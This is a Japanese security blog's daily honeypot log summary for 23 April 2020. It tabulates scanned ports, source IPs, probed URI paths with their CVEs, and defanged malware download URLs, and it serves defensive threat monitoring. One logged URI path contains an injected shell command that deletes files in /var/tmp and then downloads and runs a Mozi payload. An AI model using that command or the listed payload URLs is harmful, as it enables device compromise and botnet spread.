sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/23)

ポート 110 番(POP3)の検知数が増加していました。通信自体は調査行為止まりでしたが。。。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 173371 件
110 Post Office Protocol - Version 3 3222 件
445 Microsoft-DS 2187 件
22 The Secure Shell (SSH) Protocol 1145 件
3390 Distributed Service Coordinator 479 件
3391 SAVANT 475 件
2222 SSH 228 件
8080 HTTP Alternate (see port 80) 174 件
3389 MS WBT Server 161 件
20000 DNP 109 件
873 rsync 100 件
389 Lightweight Directory Access Protocol 98 件
514 cmd like exec, but automatic authentication is performed as for login server 95 件
6093 Unknown 94 件
503 Intrinsa 91 件
2717 PN REQUESTER 91 件
1056 VFO 90 件
6001 Unknown 83 件
1041 AK2 Product 82 件
587 Message Submission 82 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
202[.]1[.]114[.]202 Philippines 27138 件 Link
36[.]78[.]201[.]226 Indonesia 25453 件 Link
106[.]3[.]43[.]25 China 17848 件 Link
103[.]205[.]140[.]73 India 12071 件 Link
185[.]202[.]1[.]19 France 11021 件 Link
31[.]156[.]3[.]35 Italy 10503 件 Link
116[.]232[.]155[.]70 China 8033 件 Link
115[.]75[.]48[.]138 Vietnam 7704 件 Link
160[.]202[.]65[.]90 United States 7589 件 Link
45[.]141[.]87[.]27 Russia 7532 件 Link
36[.]83[.]48[.]227 Indonesia 6638 件 Link
54[.]38[.]53[.]123 France 5651 件 Link
190[.]38[.]83[.]38 Venezuela 5309 件 Link
118[.]70[.]116[.]236 Vietnam 4573 件 Link
221[.]215[.]205[.]122 China 4468 件 Link
182[.]0[.]132[.]185 Indonesia 4319 件 Link
185[.]158[.]113[.]43 Russia 4284 件 Link
196[.]45[.]17[.]178 South Africa 3838 件 Link
197[.]50[.]113[.]185 Egypt 3697 件 Link
195[.]181[.]39[.]36 Iran 3501 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
45[.]146[.]253[.]35 Germany 36 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 1 件 Link
85[.]104[.]114[.]115 Turkey 1 件 Link
58[.]96[.]242[.]120 Singapore 1 件 Link
85[.]99[.]96[.]13 Turkey 1 件 Link
41[.]203[.]212[.]101 Kenya 1 件 Link
203[.]106[.]219[.]34 Malaysia 1 件 Link
128[.]14[.]209[.]234 United States 1 件 Link
94[.]101[.]137[.]230 Iran 1 件 Link
91[.]238[.]28[.]127 Russia 1 件 Link
191[.]37[.]212[.]63 Brazil 1 件 Link
200[.]57[.]192[.]246 Mexico 1 件 Link
94[.]242[.]26[.]158 Russia 1 件 Link
139[.]99[.]141[.]237 Australia 1 件 Link
185[.]75[.]98[.]234 Iraq 1 件 Link
86[.]104[.]10[.]9 Romania 1 件 Link
192[.]241[.]238[.]141 United States 1 件 Link
85[.]238[.]106[.]16 Ukraine 1 件 Link
179[.]124[.]214[.]77 Brazil 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
45[.]146[.]253[.]35 Germany 36 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 1 件 Link
85[.]104[.]114[.]115 Turkey 1 件 Link
58[.]96[.]242[.]120 Singapore 1 件 Link
85[.]99[.]96[.]13 Turkey 1 件 Link
41[.]203[.]212[.]101 Kenya 1 件 Link
203[.]106[.]219[.]34 Malaysia 1 件 Link
128[.]14[.]209[.]234 United States 1 件 Link
94[.]101[.]137[.]230 Iran 1 件 Link
91[.]238[.]28[.]127 Russia 1 件 Link
191[.]37[.]212[.]63 Brazil 1 件 Link
200[.]57[.]192[.]246 Mexico 1 件 Link
94[.]242[.]26[.]158 Russia 1 件 Link
139[.]99[.]141[.]237 Australia 1 件 Link
185[.]75[.]98[.]234 Iraq 1 件 Link
86[.]104[.]10[.]9 Romania 1 件 Link
192[.]241[.]238[.]141 United States 1 件 Link
85[.]238[.]106[.]16 Ukraine 1 件 Link
179[.]124[.]214[.]77 Brazil 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/sdk NMAP - -
/remote/login FortiGate Firewall's SSL-VPN - Link

02 WOWHoneypot

URI Path Target CVE Memo
/WSMAN WS-Management (WSMan) - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/mOh9 - - -
/MAPI/APIUnknown - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 205723 件
/ - - 465 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 69 件
/nice - - 22 件
login[.]cgi D-Link Router - 21 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 20 件
sip:nm Session Initiation Protocol - 20 件
hxxp://checkip[.]amazonaws[.]com/ Unauthorized relay - 16 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 12 件
hxxp://pv[.]sohu[.]com/cityjson Unauthorized relay - 12 件
/cgi CGI - 11 件
/api api - 11 件
/version - - 11 件
/server-info Apache - 10 件
SERVER - - 10 件
/_ping Unknown - 9 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 8 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 8 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 5 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
/v1[.]40/containers/json Docker Engine API - 4 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 4 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 3 件
/_search Elasticsearch - 3 件
/jmx JMX - 3 件
hxxp://example[.]com/ Unauthorized relay - 2 件
/json_rpc JSON-RPC - 2 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 2 件
/nmaplowercheck1587599427 Nmap - 2 件
/HNAP1 Linksys Router D-Link Router 2 件
/evox/about Nmap - 2 件
/sdk New - 2 件
/nmaplowercheck1587646230 Nmap - 2 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/jars Unknown - 1 件
rtsp://160[.]16[.]145[.]183:1025 Real Time Streaming Protocol - 1 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/api/anonymous/cookie/post api - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/editBlackAndWhiteList DVR/NVR/IPC API - 1 件
/versions - - 1 件
/v1[.]16/version - - 1 件
/remote/login New - 1 件
/cgi-bin/luci CGI - 1 件
/login[.]htm Login Page - 1 件
/shell MVPower DVR - 1 件
RTSP://160[.]16[.]145[.]183:8554/ Real Time Streaming Protocol - 1 件
/ipp CUPS CVE-2015-1158 1 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 1 件
/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${
IFS}*;${IFS}wget${IFS}hxxp://192[.]168[.
]1[.]1:8088/Mozi[.]m;${IFS}sh${IFS}/var/
tmp/Mozi[.]m
 CGI - 1 件
/solr/admin/info/system Apache Solr - 1 件
/hudson Unknown - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 35 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 18 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 8 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 2 件
/pma/scripts/setup[.]php phpMyAdmin - 2 件
/myadmin/scripts/setup[.]php Administrator - 2 件
/MyAdmin/scripts/setup[.]php Administrator - 2 件
/mysql/scripts/setup[.]php MySQL - 2 件
/sqladmin/scripts/setup[.]php SQLAdmin - 2 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 2 件
/db/scripts/setup[.]php Database - 2 件
/scripts/setup[.]php PHPMyAdmin - 2 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
/portal/redlion Unknown - 1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 1 件
/WSMAN New - 1 件
/hudson Unknown - 1 件
/ReportServer SQL Server Reporting Services CVE-2020-0618 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 8 件
/ - - 8 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 1 件
/mOh9 New - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件
/MAPI/API New - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 206486 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 12 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6 件
hxxp://178[.]33[.]64[.]107/arm7 4 件
hxxp://19ce033f[.]ngrok[.]io/arm7 4 件
hxxp://212[.]114[.]52[.]128/arm7 2 件
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m 2 件
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 1 件
hxxp://194[.]180[.]224[.]124/bins/mpsl 1 件
hxxp://164[.]132[.]92[.]180/xtc[.]arm7 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://176[.]123[.]3[.]96/arm7 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
110 185[.]158[.]113[.]43 Russia 3220 件 Link
3391 209[.]45[.]61[.]241 Peru 466 件 Link
3390 209[.]45[.]61[.]241 Peru 465 件 Link
3389 95[.]47[.]248[.]84 Ukraine 80 件 Link
3389 222[.]235[.]220[.]206 South Korea 14 件 Link
27295 185[.]202[.]2[.]120 France 5 件 Link
24884 185[.]202[.]1[.]19 France 4 件 Link
18096 185[.]202[.]1[.]19 France 4 件 Link
19899 185[.]202[.]1[.]19 France 4 件 Link
17161 185[.]202[.]1[.]19 France 4 件 Link
16842 185[.]202[.]1[.]19 France 4 件 Link
16761 185[.]202[.]1[.]19 France 4 件 Link
23854 185[.]202[.]1[.]19 France 4 件 Link
19512 185[.]202[.]1[.]19 France 4 件 Link
23375 185[.]202[.]1[.]19 France 4 件 Link
23586 185[.]202[.]1[.]19 France 4 件 Link
19829 185[.]202[.]1[.]19 France 4 件 Link
24966 185[.]202[.]1[.]19 France 4 件 Link
19918 185[.]202[.]1[.]19 France 4 件 Link
24944 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
110 3221 件
3390 476 件
3391 474 件
3389 150 件
20000 9 件
23854 8 件
23520 8 件
23586 7 件
24673 7 件
17841 7 件
23015 7 件
23112 7 件
23475 7 件
23132 7 件
23574 7 件
17725 7 件
22920 7 件
23906 7 件
19602 7 件
24260 7 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11021 件 Link
45[.]141[.]87[.]27 Russia 7532 件 Link
185[.]158[.]113[.]43 Russia 4284 件 Link
185[.]202[.]2[.]120 France 974 件 Link
209[.]45[.]61[.]241 Peru 931 件 Link
185[.]202[.]1[.]10 France 788 件 Link
185[.]202[.]1[.]248 France 308 件 Link
79[.]124[.]62[.]254 Bulgaria 224 件 Link
195[.]54[.]167[.]115 Russia 173 件 Link
185[.]202[.]1[.]85 France 138 件 Link
95[.]47[.]248[.]84 Ukraine 80 件 Link
185[.]202[.]0[.]25 United Kingdom 60 件 Link
185[.]153[.]196[.]99 Russia 58 件 Link
185[.]153[.]199[.]12 Russia 52 件 Link
185[.]202[.]1[.]249 France 38 件 Link
222[.]235[.]220[.]206 South Korea 14 件 Link
185[.]202[.]2[.]52 France 11 件 Link
185[.]176[.]221[.]207 Latvia 10 件 Link
141[.]98[.]81[.]254 Panama 9 件 Link
185[.]202[.]2[.]247 France 8 件 Link

Port 1433

IP Country Count AbuseIPDB
202[.]1[.]114[.]202 Philippines 27138 件 Link
36[.]78[.]201[.]226 Indonesia 25453 件 Link
106[.]3[.]43[.]25 China 17848 件 Link
103[.]205[.]140[.]73 India 12071 件 Link
31[.]156[.]3[.]35 Italy 10503 件 Link
116[.]232[.]155[.]70 China 8033 件 Link
115[.]75[.]48[.]138 Vietnam 7704 件 Link
160[.]202[.]65[.]90 United States 7589 件 Link
36[.]83[.]48[.]227 Indonesia 6638 件 Link
54[.]38[.]53[.]123 France 5651 件 Link
190[.]38[.]83[.]38 Venezuela 5309 件 Link
118[.]70[.]116[.]236 Vietnam 4573 件 Link
221[.]215[.]205[.]122 China 4468 件 Link
182[.]0[.]132[.]185 Indonesia 4319 件 Link
196[.]45[.]17[.]178 South Africa 3838 件 Link
197[.]50[.]113[.]185 Egypt 3697 件 Link
195[.]181[.]39[.]36 Iran 3501 件 Link
157[.]42[.]246[.]229 India 2484 件 Link
36[.]90[.]60[.]64 Indonesia 1993 件 Link
190[.]73[.]68[.]118 Venezuela 1562 件 Link